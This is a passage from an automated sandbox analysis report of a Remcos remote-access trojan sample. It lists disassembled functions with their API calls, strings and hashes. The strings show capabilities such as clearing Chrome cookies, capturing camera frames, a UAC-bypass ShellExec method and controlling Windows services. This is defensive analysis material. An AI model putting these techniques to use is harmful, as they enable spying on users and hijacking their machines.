                                                              • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                              • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                              • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                              • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                              Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                              • _free.LIBCMT ref: 00450FC8
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00450FD3
                                                              • _free.LIBCMT ref: 00450FDE
                                                              • _free.LIBCMT ref: 00451032
                                                              • _free.LIBCMT ref: 0045103D
                                                              • _free.LIBCMT ref: 00451048
                                                              • _free.LIBCMT ref: 00451053
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                              • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                              • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                              Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                              • int.LIBCPMT ref: 004111BE
                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                              • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                              • String ID: (mG
                                                              • API String ID: 2536120697-4059303827
                                                              • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                              • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                              • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                              • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                              Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                              • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 1866151309-2070987746
                                                              • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                              • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                              • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                              • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                              Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                              • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                              • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                              • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                              • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                              Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe), ref: 0040760B
                                                                • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                              • CoUninitialize.OLE32 ref: 00407664
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                              • API String ID: 3851391207-2455460064
                                                              • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                              • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                              • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                              • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                              Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                              • GetLastError.KERNEL32 ref: 0040BB22
                                                              Strings
                                                              • UserProfile, xrefs: 0040BAE8
                                                              • [Chrome Cookies not found], xrefs: 0040BB3C
                                                              • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                              • API String ID: 2018770650-304995407
                                                              • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                              • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                              • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                              • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                              Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Console$AllocOutputShowWindow
                                                              • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                              • API String ID: 2425139147-2212855755
                                                              • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                              • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                              • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                              • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                              Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                              • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                              • API String ID: 4061214504-213444651
                                                              • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                              • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                              • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                              • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                              Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __allrem.LIBCMT ref: 0043ACE9
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                              • __allrem.LIBCMT ref: 0043AD1C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                              • __allrem.LIBCMT ref: 0043AD51
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                              • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                              • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                              • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                              Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologSleep
                                                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                              • API String ID: 3469354165-3054508432
                                                              • Opcode ID: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                              • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                              • Opcode Fuzzy Hash: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                              • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                              Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                              • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                                • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                                • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                                • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                              • String ID:
                                                              • API String ID: 3950776272-0
                                                              • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                              • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                              • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                              • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                              Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                              • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                              • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                              • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                              Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                              • String ID:
                                                              • API String ID: 493672254-0
                                                              • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                              • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                              • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                              • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                              Function 0044A084 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID: PkGNG
                                                              • API String ID: 1036877536-263838557
                                                              • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                              • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                              • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                              • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                              Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                              • _free.LIBCMT ref: 004482CC
                                                              • _free.LIBCMT ref: 004482F4
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                              • _abort.LIBCMT ref: 00448313
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                              • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                              • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                              • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                              Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                              • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                              • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                              • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                              Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                              • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                              • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                              • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                              Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                              • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                              • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                              • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                              Function 00442851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PkGNG
                                                              • API String ID: 0-263838557
